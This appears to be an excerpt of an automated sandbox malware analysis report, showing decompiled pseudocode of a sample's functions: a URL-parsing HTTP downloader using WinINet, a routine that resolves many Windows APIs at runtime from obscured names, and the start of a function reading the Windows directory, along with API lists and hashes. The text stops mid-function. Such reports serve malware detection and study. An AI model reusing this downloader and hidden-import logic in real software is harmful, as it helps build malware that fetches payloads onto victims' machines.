				 *((char*)(_t471 + 0x1a4)) = 0;
				 *(_t471 - 4) = 6;
				 *(_t471 - 0x14) = 0;
				_t290 = E0040A07D(_t471 + 0x3df4, __ecx, _t471 + 0x1c);
				 *(_t471 - 4) = 7;
				E004042ED(_t471 + 0x230, _t290);
				 *(_t471 - 4) = 6;
				E00404354(_t471 + 0x1c, 1, 0);
				_t445 = 8;
				_t427 = _t471 + 0x230;
				if(E0040C0F9(_t445, _t471 + 0x230, "https://", _t445) == 0) {
					L2:
					 *(_t471 - 0x14) = _t445;
					L3:
					_t401 = _t471 + 0x230;
					 *((char*)(_t471 - 0x18)) = 0x2f;
					_t297 = E0040C06B( *(_t471 - 0x14) + 1, _t471 + 0x230, _t471 + 0x230, _t471 - 0x18, 1);
					 *(_t471 - 0x1c) = _t297;
					_t479 = _t297 - 0xffffffff;
					if(_t297 != 0xffffffff) {
						_t299 = E0040C034(_t401, _t471 + 0xfc, _t471 + 0x230, _t297, 0xffffffff);
						 *(_t471 - 4) = 9;
						 *(_t471 - 0x10) = 2;
					} else {
						 *((intOrPtr*)(_t471 + 0x180)) = 0xf;
						 *((intOrPtr*)(_t471 + 0x17c)) = 0;
						 *((char*)(_t471 + 0x16c)) = 0;
						E00404396(_t471 + 0x16c, _t479, 0x43c8d8, 0);
						 *(_t471 - 4) = 8;
						_t299 = _t471 + 0x16c;
						 *(_t471 - 0x10) = 1;
					}
					_t447 = _t299;
					_t432 = _t471 + 0x214;
					E004042ED(_t471 + 0x214, _t299);
					if(( *(_t471 - 0x10) & 0x00000002) != 0) {
						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffffffd;
						E00404354(_t471 + 0xfc, 1, 0);
					}
					 *(_t471 - 4) = 6;
					if(( *(_t471 - 0x10) & 0x00000001) != 0) {
						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffffffe;
						E00404354(_t471 + 0x16c, 1, 0);
					}
					_t402 =  *(_t471 - 0x1c);
					_t301 =  *((intOrPtr*)(_t471 + 0x230));
					if(_t402 == 0xffffffff) {
						__eflags =  *((intOrPtr*)(_t471 + 0x244)) - 0x10;
						if(__eflags < 0) {
							_t301 = _t471 + 0x230;
						}
						_t402 =  *(_t471 + 0x240);
					} else {
						if( *((intOrPtr*)(_t471 + 0x244)) < 0x10) {
							_t301 = _t471 + 0x230;
						}
					}
					_t403 = _t402 + _t301;
					_t486 =  *((intOrPtr*)(_t471 + 0x244)) - 0x10;
					_t302 =  *((intOrPtr*)(_t471 + 0x230));
					if( *((intOrPtr*)(_t471 + 0x244)) < 0x10) {
						_t302 = _t471 + 0x230;
					}
					_push( *(_t471 - 0x24));
					_push(_t403);
					_push(_t302 +  *(_t471 - 0x14));
					_push(_t471 + 0x188);
					 *((intOrPtr*)(_t471 + 0x19c)) = 0xf;
					 *((intOrPtr*)(_t471 + 0x198)) = 0;
					 *((char*)(_t471 + 0x188)) = 0;
					E0040C37A(0, _t427, _t432, _t447, _t486);
					_t448 = _t471 + 0x188;
					 *(_t471 - 4) = 0xa;
					E004042ED(_t471 + 0x1f8, _t448);
					_t404 = _t448;
					 *(_t471 - 4) = 6;
					E00404354(_t448, 1, 0);
					if(E0040C00F(_t471 + 0x214, "#", 0) == 0xffffffff) {
						_t311 = E00404778(_t471 + 0x54, _t471 + 0x214);
						 *(_t471 - 4) = 0xc;
						_t96 = _t471 - 0x10;
						 *_t96 =  *(_t471 - 0x10) | 0x00000008;
						__eflags =  *_t96;
					} else {
						_t311 = E0040C034(_t404, _t471 + 0xe0, _t471 + 0x214, 0, _t309);
						 *(_t471 - 4) = 0xb;
						 *(_t471 - 0x10) =  *(_t471 - 0x10) | 0x00000004;
					}
					E004042ED(_t471 + 0x214, _t311);
					if(( *(_t471 - 0x10) & 0x00000008) != 0) {
						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffffff7;
						_t404 = _t471 + 0x54;
						E00404354(_t471 + 0x54, 1, 0);
					}
					 *(_t471 - 4) = 6;
					if(( *(_t471 - 0x10) & 0x00000004) != 0) {
						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffffffb;
						_t404 = _t471 + 0xe0;
						E00404354(_t471 + 0xe0, 1, 0);
					}
					_t314 = E0040C00F(_t471 + 0x1f8, ":", 0);
					 *(_t471 - 0x1c) = _t314;
					if(_t314 == 0xffffffff) {
						_t404 = _t471 + 0x150;
						 *((intOrPtr*)(_t471 + 0x164)) = 0xf;
						 *((intOrPtr*)(_t471 + 0x160)) = 0;
						 *((char*)(_t471 + 0x150)) = 0;
						E00404396(_t471 + 0x150, __eflags, 0x43c8d8, 0);
						 *(_t471 - 4) = 0xe;
						_t124 = _t471 - 0x10;
						 *_t124 =  *(_t471 - 0x10) | 0x00000020;
						__eflags =  *_t124;
						_t316 = _t471 + 0x150;
					} else {
						_t316 = E0040C034(_t404, _t471 + 0xc4, _t471 + 0x1f8, _t314 + 1, 0xffffffff);
						 *(_t471 - 4) = 0xd;
						 *(_t471 - 0x10) =  *(_t471 - 0x10) | 0x00000010;
					}
					E004042ED(_t471 + 0x1dc, _t316);
					if(( *(_t471 - 0x10) & 0x00000020) != 0) {
						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xffffffdf;
						_t404 = _t471 + 0x150;
						E00404354(_t471 + 0x150, 1, 0);
					}
					 *(_t471 - 4) = 6;
					if(( *(_t471 - 0x10) & 0x00000010) != 0) {
						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xffffffef;
						_t404 = _t471 + 0xc4;
						E00404354(_t471 + 0xc4, 1, 0);
					}
					_t318 =  *(_t471 - 0x1c);
					if( *(_t471 - 0x1c) == 0xffffffff) {
						_t318 =  *(_t471 + 0x208);
					}
					_t320 = E0040C034(_t404, _t471 + 0x38, _t471 + 0x1f8, 0, _t318);
					 *(_t471 - 4) = 0xf;
					E004042ED(_t471 + 0x1f8, _t320);
					_t405 = _t471 + 0x38;
					 *(_t471 - 4) = 6;
					E00404354(_t471 + 0x38, 1, 0);
					_t323 =  *(_t471 - 0x14);
					if( *(_t471 - 0x14) <= 0) {
						_t405 = _t471 + 0x118;
						 *((intOrPtr*)(_t471 + 0x12c)) = 0xf;
						 *((intOrPtr*)(_t471 + 0x128)) = 0;
						 *(_t471 + 0x118) = 0;
						E00404396(_t471 + 0x118, __eflags, 0x43c8d8, 0);
						 *(_t471 - 4) = 0x11;
						_t159 = _t471 - 0x10;
						 *_t159 =  *(_t471 - 0x10) | 0x00000080;
						__eflags =  *_t159;
						_t325 = _t471 + 0x118;
					} else {
						_t325 = E0040C034(_t405, _t471, _t471 + 0x230, 0, _t323 + 0xfffffffd);
						 *(_t471 - 4) = 0x10;
						 *(_t471 - 0x10) =  *(_t471 - 0x10) | 0x00000040;
					}
					E004042ED(_t471 + 0x1c0, _t325);
					if(( *(_t471 - 0x10) & 0x00000080) != 0) {
						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xffffff7f;
						_t405 = _t471 + 0x118;
						E00404354(_t471 + 0x118, 1, 0);
					}
					 *(_t471 - 4) = 6;
					if(( *(_t471 - 0x10) & 0x00000040) != 0) {
						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xffffffbf;
						_t405 = _t471;
						E00404354(_t471, 1, 0);
					}
					_t328 = E0040C00F(_t471 + 0x214, "?", 0);
					 *(_t471 - 0x14) = _t328;
					if(_t328 == 0xffffffff) {
						_t405 = _t471 + 0x134;
						 *((intOrPtr*)(_t471 + 0x148)) = 0xf;
						 *((intOrPtr*)(_t471 + 0x144)) = 0;
						 *(_t471 + 0x134) = 0;
						E00404396(_t471 + 0x134, __eflags, 0x43c8d8, 0);
						 *(_t471 - 4) = 0x13;
						_t187 = _t471 - 0x10;
						 *_t187 =  *(_t471 - 0x10) | 0x00000200;
						__eflags =  *_t187;
						_t330 = _t471 + 0x134;
					} else {
						_t330 = E0040C034(_t405, _t471 + 0x8c, _t471 + 0x214, _t328 + 1, 0xffffffff);
						 *(_t471 - 4) = 0x12;
						 *(_t471 - 0x10) =  *(_t471 - 0x10) | 0x00000100;
					}
					E004042ED(_t471 + 0x1a4, _t330);
					if(( *(_t471 - 0x10) & 0x00000200) != 0) {
						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffffdff;
						_t405 = _t471 + 0x134;
						E00404354(_t471 + 0x134, 1, 0);
					}
					 *(_t471 - 4) = 6;
					if(( *(_t471 - 0x10) & 0x00000100) != 0) {
						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffffeff;
						_t405 = _t471 + 0x8c;
						E00404354(_t471 + 0x8c, 1, 0);
					}
					_t332 = _t471 + 0x214;
					if( *(_t471 - 0x14) == 0xffffffff) {
						_t333 = E00404778(_t471 + 0xa8, _t332);
						 *(_t471 - 4) = 0x15;
						_t213 = _t471 - 0x10;
						 *_t213 =  *(_t471 - 0x10) | 0x00000800;
						__eflags =  *_t213;
					} else {
						_t333 = E0040C034(_t405, _t471 + 0x70, _t332, 0,  *(_t471 - 0x14));
						 *(_t471 - 4) = 0x14;
						 *(_t471 - 0x10) =  *(_t471 - 0x10) | 0x00000400;
					}
					E004042ED(_t471 + 0x214, _t333);
					if(( *(_t471 - 0x10) & 0x00000800) != 0) {
						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffff7ff;
						E00404354(_t471 + 0xa8, 1, 0);
					}
					 *(_t471 - 4) = 6;
					if(( *(_t471 - 0x10) & 0x00000400) != 0) {
						 *(_t471 - 0x10) =  *(_t471 - 0x10) & 0xfffffbff;
						E00404354(_t471 + 0x70, 1, 0);
					}
					_t406 = 0x3a98;
					_t335 = _t471 + 0x24c;
					do {
						 *_t335 = 0;
						_t335 = _t335 + 1;
						_t406 = _t406 - 1;
					} while (_t406 != 0);
					_t336 =  *(_t471 + 0x1f8);
					_t458 = 0x10;
					if( *((intOrPtr*)(_t471 + 0x20c)) < _t458) {
						_t336 = _t471 + 0x1f8;
					}
					DeleteUrlCacheEntry(_t336); // executed
					_t338 =  *(_t471 + 0x3df4);
					if( *((intOrPtr*)(_t471 + 0x3e08)) < _t458) {
						_t338 = _t471 + 0x3df4;
					}
					DeleteUrlCacheEntry(_t338);
					_t340 = InternetOpenA(0x43c8d8, 0, 0, 0, 0); // executed
					 *(_t471 - 0x14) = _t340;
					_t341 =  *((intOrPtr*)(_t471 + 0x1dc));
					if( *((intOrPtr*)(_t471 + 0x1f0)) < _t458) {
						_t341 = _t471 + 0x1dc;
					}
					_push(_t341);
					 *(_t471 - 0x1c) = E0041EA23();
					_t343 =  *((intOrPtr*)(_t471 + 0x1c0));
					if( *((intOrPtr*)(_t471 + 0x1d4)) < _t458) {
						_t343 = _t471 + 0x1c0;
					}
					_t344 =  *0x446458(_t343, "https");
					asm("sbb esi, esi");
					_t462 = ( ~_t344 & 0xff800000) + 0x4800000;
					if( *(_t471 - 0x14) == 0) {
						L80:
						_push(_t471 + 0x24c);
						goto L81;
					} else {
						_t356 =  *(_t471 + 0x1f8);
						if( *((intOrPtr*)(_t471 + 0x20c)) < 0x10) {
							_t356 = _t471 + 0x1f8;
						}
						_t357 = InternetConnectA( *(_t471 - 0x14), _t356,  *(_t471 - 0x1c), 0, 0, 3, _t462, 0); // executed
						 *(_t471 - 0x10) = _t357;
						if(_t357 == 0) {
							L79:
							InternetCloseHandle( *(_t471 - 0x14));
							goto L80;
						} else {
							_t420 =  *(_t471 + 0x214);
							if( *((intOrPtr*)(_t471 + 0x228)) < 0x10) {
								_t420 = _t471 + 0x214;
							}
							_t359 = HttpOpenRequestA(_t357, "GET", _t420, 0, 0, 0, _t462, 0); // executed
							_t465 = _t359;
							if(_t465 == 0) {
								L78:
								InternetCloseHandle( *(_t471 - 0x10));
								goto L79;
							} else {
								_t361 = HttpSendRequestA(_t465, 0, 0, 0, 0); // executed
								 *(_t471 - 0x1c) = _t361;
								 *(_t471 - 0x28) = 0x100;
								if(HttpQueryInfoA(_t465, 0x13, _t471 + 0x3ce4, _t471 - 0x28, 0) != 0) {
									_push(_t471 + 0x3ce4);
									_t366 = E0041EA23();
									__eflags = _t366 - 0xc8;
									if(_t366 != 0xc8) {
										goto L73;
									}
									__eflags =  *(_t471 - 0x1c);
									if( *(_t471 - 0x1c) != 0) {
										InternetReadFile(_t465, _t471 + 0x24c, 0x3a97, _t471 - 0x24); // executed
										 *((char*)(_t471 +  *(_t471 - 0x24) + 0x24c)) = 0;
									}
									InternetCloseHandle(_t465); // executed
									goto L78;
								}
								L73:
								_push("ERROR");
								L81:
								_t463 =  *((intOrPtr*)(_t471 - 0x20));
								 *((intOrPtr*)(_t463 + 0x14)) = 0xf;
								 *((intOrPtr*)(_t463 + 0x10)) = 0;
								 *_t463 = 0;
								E00404331(_t463);
								E00404354(_t471 + 0x1a4, 1, 0);
								E00404354(_t471 + 0x1dc, 1, 0);
								E00404354(_t471 + 0x1c0, 1, 0);
								E00404354(_t471 + 0x230, 1, 0);
								E00404354(_t471 + 0x1f8, 1, 0);
								E00404354(_t471 + 0x214, 1, 0);
								E00404354(_t471 + 0x3df4, 1, 0);
								 *[fs:0x0] =  *((intOrPtr*)(_t471 - 0xc));
								_pop(_t442);
								_pop(_t464);
								_pop(_t396);
								return E0041DA9B(_t463, _t396,  *(_t471 + 0x3de4) ^ _t471, _t427, _t442, _t464);
							}
						}
					}
				}
				_t445 = 7;
				_t427 = _t471 + 0x230;
				if(E0040C0F9(_t445, _t471 + 0x230, "http://", _t445) != 0) {
					goto L3;
				}
				goto L2;
			}



















































                                                                    0x0040a1c2
                                                                    0x0040a1ce
                                                                    0x0040a1d3
                                                                    0x0040a1d5
                                                                    0x0040a1e0
                                                                    0x0040a1e4
                                                                    0x0040a1e9
                                                                    0x0040a1eb
                                                                    0x0040a1f4
                                                                    0x0040a1f8
                                                                    0x0040a206
                                                                    0x0040a209
                                                                    0x0040a20e
                                                                    0x0040a211
                                                                    0x0040a212
                                                                    0x0040a218
                                                                    0x0040a21e
                                                                    0x0040a224
                                                                    0x0040a22a
                                                                    0x0040a230
                                                                    0x0040a236
                                                                    0x0040a23c
                                                                    0x0040a242
                                                                    0x0040a248
                                                                    0x0040a24e
                                                                    0x0040a254
                                                                    0x0040a25a
                                                                    0x0040a260
                                                                    0x0040a266
                                                                    0x0040a26c
                                                                    0x0040a272
                                                                    0x0040a278
                                                                    0x0040a288
                                                                    0x0040a28c
                                                                    0x0040a28f
                                                                    0x0040a29d
                                                                    0x0040a2a1
                                                                    0x0040a2ae
                                                                    0x0040a2b2
                                                                    0x0040a2b9
                                                                    0x0040a2c2
                                                                    0x0040a2cf
                                                                    0x0040a2eb
                                                                    0x0040a2eb
                                                                    0x0040a2ee
                                                                    0x0040a2f6
                                                                    0x0040a2fe
                                                                    0x0040a302
                                                                    0x0040a307
                                                                    0x0040a30a
                                                                    0x0040a30d
                                                                    0x0040a355
                                                                    0x0040a35a
                                                                    0x0040a361
                                                                    0x0040a30f
                                                                    0x0040a31b
                                                                    0x0040a325
                                                                    0x0040a32b
                                                                    0x0040a331
                                                                    0x0040a336
                                                                    0x0040a33a
                                                                    0x0040a340
                                                                    0x0040a340
                                                                    0x0040a368
                                                                    0x0040a36a
                                                                    0x0040a370
                                                                    0x0040a379
                                                                    0x0040a37b
                                                                    0x0040a388
                                                                    0x0040a388
                                                                    0x0040a38d
                                                                    0x0040a398
                                                                    0x0040a39a
                                                                    0x0040a3a7
                                                                    0x0040a3a7
                                                                    0x0040a3ac
                                                                    0x0040a3af
                                                                    0x0040a3b8
                                                                    0x0040a3cb
                                                                    0x0040a3d2
                                                                    0x0040a3d4
                                                                    0x0040a3d4
                                                                    0x0040a3da
                                                                    0x0040a3ba
                                                                    0x0040a3c1
                                                                    0x0040a3c3
                                                                    0x0040a3c3
                                                                    0x0040a3c1
                                                                    0x0040a3e0
                                                                    0x0040a3e2
                                                                    0x0040a3e9
                                                                    0x0040a3ef
                                                                    0x0040a3f1
                                                                    0x0040a3f1
                                                                    0x0040a3f7
                                                                    0x0040a3fd
                                                                    0x0040a3fe
                                                                    0x0040a405
                                                                    0x0040a406
                                                                    0x0040a410
                                                                    0x0040a416
                                                                    0x0040a41c
                                                                    0x0040a421
                                                                    0x0040a42d
                                                                    0x0040a431
                                                                    0x0040a439
                                                                    0x0040a43b
                                                                    0x0040a43f
                                                                    0x0040a459
                                                                    0x0040a483
                                                                    0x0040a488
                                                                    0x0040a48f
                                                                    0x0040a48f
                                                                    0x0040a48f
                                                                    0x0040a45b
                                                                    0x0040a46a
                                                                    0x0040a46f
                                                                    0x0040a473
                                                                    0x0040a473
                                                                    0x0040a49b
                                                                    0x0040a4a4
                                                                    0x0040a4a6
                                                                    0x0040a4ad
                                                                    0x0040a4b0
                                                                    0x0040a4b0
                                                                    0x0040a4b5
                                                                    0x0040a4c0
                                                                    0x0040a4c2
                                                                    0x0040a4c9
                                                                    0x0040a4cf
                                                                    0x0040a4cf
                                                                    0x0040a4e1
                                                                    0x0040a4e6
                                                                    0x0040a4ec
                                                                    0x0040a514
                                                                    0x0040a51a
                                                                    0x0040a524
                                                                    0x0040a52a
                                                                    0x0040a530
                                                                    0x0040a535
                                                                    0x0040a53c
                                                                    0x0040a53c
                                                                    0x0040a53c
                                                                    0x0040a540
                                                                    0x0040a4ee
                                                                    0x0040a4ff
                                                                    0x0040a504
                                                                    0x0040a508
                                                                    0x0040a508
                                                                    0x0040a54e
                                                                    0x0040a557
                                                                    0x0040a559
                                                                    0x0040a560
                                                                    0x0040a566
                                                                    0x0040a566
                                                                    0x0040a56b
                                                                    0x0040a576
                                                                    0x0040a578
                                                                    0x0040a57f
                                                                    0x0040a585
                                                                    0x0040a585
                                                                    0x0040a58a
                                                                    0x0040a590
                                                                    0x0040a592
                                                                    0x0040a592
                                                                    0x0040a5a4
                                                                    0x0040a5b1
                                                                    0x0040a5b5
                                                                    0x0040a5bd
                                                                    0x0040a5c0
                                                                    0x0040a5c4
                                                                    0x0040a5c9
                                                                    0x0040a5ce
                                                                    0x0040a5f4
                                                                    0x0040a5fa
                                                                    0x0040a604
                                                                    0x0040a60a
                                                                    0x0040a610
                                                                    0x0040a615
                                                                    0x0040a61c
                                                                    0x0040a61c
                                                                    0x0040a61c
                                                                    0x0040a623
                                                                    0x0040a5d0
                                                                    0x0040a5df
                                                                    0x0040a5e4
                                                                    0x0040a5e8
                                                                    0x0040a5e8
                                                                    0x0040a631
                                                                    0x0040a63a
                                                                    0x0040a63c
                                                                    0x0040a646
                                                                    0x0040a64c
                                                                    0x0040a64c
                                                                    0x0040a651
                                                                    0x0040a65c
                                                                    0x0040a65e
                                                                    0x0040a665
                                                                    0x0040a668
                                                                    0x0040a668
                                                                    0x0040a67a
                                                                    0x0040a67f
                                                                    0x0040a685
                                                                    0x0040a6b0
                                                                    0x0040a6b6
                                                                    0x0040a6c0
                                                                    0x0040a6c6
                                                                    0x0040a6cc
                                                                    0x0040a6d1
                                                                    0x0040a6d8
                                                                    0x0040a6d8
                                                                    0x0040a6d8
                                                                    0x0040a6df
                                                                    0x0040a687
                                                                    0x0040a698
                                                                    0x0040a69d
                                                                    0x0040a6a1
                                                                    0x0040a6a1
                                                                    0x0040a6ed
                                                                    0x0040a6f9
                                                                    0x0040a6fb
                                                                    0x0040a705
                                                                    0x0040a70b
                                                                    0x0040a70b
                                                                    0x0040a710
                                                                    0x0040a71e
                                                                    0x0040a720
                                                                    0x0040a72a
                                                                    0x0040a730
                                                                    0x0040a730
                                                                    0x0040a739
                                                                    0x0040a73f
                                                                    0x0040a762
                                                                    0x0040a767
                                                                    0x0040a76e
                                                                    0x0040a76e
                                                                    0x0040a76e
                                                                    0x0040a741
                                                                    0x0040a749
                                                                    0x0040a74e
                                                                    0x0040a752
                                                                    0x0040a752
                                                                    0x0040a77d
                                                                    0x0040a78c
                                                                    0x0040a78e
                                                                    0x0040a79d
                                                                    0x0040a79d
                                                                    0x0040a7a2
                                                                    0x0040a7b0
                                                                    0x0040a7b2
                                                                    0x0040a7be
                                                                    0x0040a7be
                                                                    0x0040a7c3
                                                                    0x0040a7c8
                                                                    0x0040a7ce
                                                                    0x0040a7ce
                                                                    0x0040a7d0
                                                                    0x0040a7d1
                                                                    0x0040a7d1
                                                                    0x0040a7d4
                                                                    0x0040a7dc
                                                                    0x0040a7e3
                                                                    0x0040a7e5
                                                                    0x0040a7e5
                                                                    0x0040a7ec
                                                                    0x0040a7f2
                                                                    0x0040a7fe
                                                                    0x0040a800
                                                                    0x0040a800
                                                                    0x0040a807
                                                                    0x0040a816
                                                                    0x0040a81c
                                                                    0x0040a81f
                                                                    0x0040a82b
                                                                    0x0040a82d
                                                                    0x0040a82d
                                                                    0x0040a833
                                                                    0x0040a839
                                                                    0x0040a83c
                                                                    0x0040a849
                                                                    0x0040a84b
                                                                    0x0040a84b
                                                                    0x0040a857
                                                                    0x0040a861
                                                                    0x0040a869
                                                                    0x0040a872
                                                                    0x0040a960
                                                                    0x0040a966
                                                                    0x00000000
                                                                    0x0040a878
                                                                    0x0040a87f
                                                                    0x0040a885
                                                                    0x0040a887
                                                                    0x0040a887
                                                                    0x0040a89a
                                                                    0x0040a8a0
                                                                    0x0040a8a5
                                                                    0x0040a957
                                                                    0x0040a95a
                                                                    0x00000000
                                                                    0x0040a8ab
                                                                    0x0040a8b2
                                                                    0x0040a8b8
                                                                    0x0040a8ba
                                                                    0x0040a8ba
                                                                    0x0040a8cc
                                                                    0x0040a8d2
                                                                    0x0040a8d6
                                                                    0x0040a94e
                                                                    0x0040a951
                                                                    0x00000000
                                                                    0x0040a8d8
                                                                    0x0040a8dd
                                                                    0x0040a8e4
                                                                    0x0040a8f5
                                                                    0x0040a904
                                                                    0x0040a913
                                                                    0x0040a914
                                                                    0x0040a91a
                                                                    0x0040a91f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040a921
                                                                    0x0040a924
                                                                    0x0040a937
                                                                    0x0040a940
                                                                    0x0040a940
                                                                    0x0040a948
                                                                    0x00000000
                                                                    0x0040a948
                                                                    0x0040a906
                                                                    0x0040a906
                                                                    0x0040a967
                                                                    0x0040a967
                                                                    0x0040a96a
                                                                    0x0040a971
                                                                    0x0040a976
                                                                    0x0040a978
                                                                    0x0040a985
                                                                    0x0040a992
                                                                    0x0040a99f
                                                                    0x0040a9ac
                                                                    0x0040a9b9
                                                                    0x0040a9c6
                                                                    0x0040a9d3
                                                                    0x0040a9dd
                                                                    0x0040a9e5
                                                                    0x0040a9e6
                                                                    0x0040a9e7
                                                                    0x0040a9fc
                                                                    0x0040a9fc
                                                                    0x0040a8d6
                                                                    0x0040a8a5
                                                                    0x0040a872
                                                                    0x0040a2d3
                                                                    0x0040a2dc
                                                                    0x0040a2e9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 004042ED: _memmove.LIBCMT ref: 00404309
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                      • Part of subcall function 00404396: _memmove.LIBCMT ref: 004043E7
                                                                    • DeleteUrlCacheEntry.WININET(?), ref: 0040A7EC
                                                                    • DeleteUrlCacheEntry.WININET(?), ref: 0040A807
                                                                    • InternetOpenA.WININET(0043C8D8,00000000,00000000,00000000,00000000), ref: 0040A816
                                                                    • StrCmpCA.SHLWAPI(?,https), ref: 0040A857
                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,-04800000,00000000), ref: 0040A89A
                                                                    • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,-04800000,00000000), ref: 0040A8CC
                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040A8DD
                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040A8FC
                                                                    • InternetReadFile.WININET(00000000,?,00003A97,?), ref: 0040A937
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040A948
                                                                    • InternetCloseHandle.WININET(?), ref: 0040A951
                                                                    • InternetCloseHandle.WININET(?), ref: 0040A95A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Internet$CloseHandleHttp_memmove$CacheDeleteEntryOpenRequest$ConnectFileInfoQueryReadSend
                                                                    • String ID: ERROR$GET$http://$https$https://
                                                                    • API String ID: 2523455513-650462858
                                                                    • Opcode ID: 145ba49181d24a9f971275a7b9d72ff4315adad309d865146dc575154e394ff7
                                                                    • Instruction ID: 8b6035fab06e129754a09b681593b440589fcea7e7ab5634ae7be08f0c245f5f
                                                                    • Opcode Fuzzy Hash: 145ba49181d24a9f971275a7b9d72ff4315adad309d865146dc575154e394ff7
                                                                    • Instruction Fuzzy Hash: 3A328EB180028DDEDB30DF55CD89BEE77A8BF15318F10062AE919AB1D1D7781B48CB65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041899F Relevance: 22.6, APIs: 15, Instructions: 70libraryloaderCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 410 41899f-4189b2 LoadLibraryA 411 4189b8-418ad9 GetProcAddress * 12 410->411 412 418ada-418aed LoadLibraryA 410->412 411->412 413 418b01 412->413 414 418aef-418afc GetProcAddress 412->414 414->413
                                                                    C-Code - Quality: 92%
                                                                    			E0041899F() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				_Unknown_base(*)()* _t5;
				void* _t17;

				_t1 = LoadLibraryA( *0x445b48);
				 *0x446474 = _t1;
				if(_t1 != 0) {
					 *0x44641c = GetProcAddress(_t1,  *0x445c14);
					_t5 = GetProcAddress( *0x446474,  *0x445e74);
					 *0x44637c = _t5;
					 *0x446428 =  *_t5( *0x446474,  *0x44613c, _t17);
					 *0x446298 = GetProcAddress( *0x446474,  *0x445d2c);
					 *0x4463c4 = GetProcAddress( *0x446474,  *0x445ac8);
					 *0x44638c = GetProcAddress( *0x446474,  *0x4461c8);
					 *0x4464a4 = GetProcAddress( *0x446474,  *0x445c34);
					 *0x44645c = GetProcAddress( *0x446474,  *0x445d64);
					 *0x4463d4 = GetProcAddress( *0x446474,  *0x445e2c);
					 *0x4462fc = GetProcAddress( *0x446474,  *0x4460f8);
					 *0x4463fc = GetProcAddress( *0x446474,  *0x445fac);
					 *0x4463d0 = GetProcAddress( *0x446474,  *0x445b30);
					 *0x446400 = GetProcAddress( *0x446474,  *0x4461a0);
				}
				_t2 = LoadLibraryA( *0x446078); // executed
				 *0x446260 = _t2;
				if(_t2 != 0) {
					_t3 = GetProcAddress(_t2,  *0x445fb0);
					 *0x446354 = _t3;
					return _t3;
				}
				return _t2;
			}








                                                                    0x004189a5
                                                                    0x004189ab
                                                                    0x004189b2
                                                                    0x004189ce
                                                                    0x004189d9
                                                                    0x004189e1
                                                                    0x004189f4
                                                                    0x00418a0b
                                                                    0x00418a22
                                                                    0x00418a39
                                                                    0x00418a50
                                                                    0x00418a67
                                                                    0x00418a7e
                                                                    0x00418a95
                                                                    0x00418aac
                                                                    0x00418ac3
                                                                    0x00418ad4
                                                                    0x00418ad9
                                                                    0x00418ae0
                                                                    0x00418ae6
                                                                    0x00418aed
                                                                    0x00418af6
                                                                    0x00418afc
                                                                    0x00000000
                                                                    0x00418afc
                                                                    0x00418b01

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 2238633743-0
                                                                    • Opcode ID: 6fa6767ac5a0adf8d25a67291e1676a3f66c8230617337273f847c892ed360e1
                                                                    • Instruction ID: dc9ff5b1b1a2dcea5952fe958f5213409efa8aa48f08c05d81d78615b1a2f929
                                                                    • Opcode Fuzzy Hash: 6fa6767ac5a0adf8d25a67291e1676a3f66c8230617337273f847c892ed360e1
                                                                    • Instruction Fuzzy Hash: 4531F5BD401A51AFEF125F71ED498257EB6FB0B652702813AE95182232DB324864EF0E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00414C66 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 184memoryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    C-Code - Quality: 96%
                                                                    			E00414C66(void* __ebx, CHAR* __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t72;
				signed int _t74;
				long _t76;
				signed char* _t84;
				signed char* _t85;
				void* _t86;
				void* _t88;
				void* _t89;
				void* _t92;
				void* _t127;
				CHAR* _t130;
				signed char* _t131;
				signed char* _t137;
				void* _t145;

				_push(0x1e0);
				E0042083E(E0043412D, __ebx, __edi, __esi);
				_t110 = 0;
				 *(_t145 - 0x1e8) = 0;
				_t136 = __ecx;
				 *(_t145 - 0x1ec) = __ecx;
				 *(_t145 - 0x1e4) = 0;
				 *(_t145 - 0x120) = 0xf;
				 *((intOrPtr*)(_t145 - 0x124)) = 0;
				 *(_t145 - 0x134) = 0;
				 *((intOrPtr*)(_t145 - 4)) = 0;
				if(GetWindowsDirectoryA(_t145 - 0x118, 0x104) == 0) {
					 *(_t145 - 0x118) = 0x43;
				}
				 *(_t145 - 0x1e0) =  *(_t145 - 0x118);
